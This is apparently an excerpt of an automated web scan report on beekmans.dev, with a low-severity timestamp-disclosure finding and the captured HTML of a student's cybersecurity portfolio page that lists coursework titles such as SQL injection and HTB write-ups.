          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          000613396
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        2. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          080804898, which evaluates to: 1972-07-24 06:48:18

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
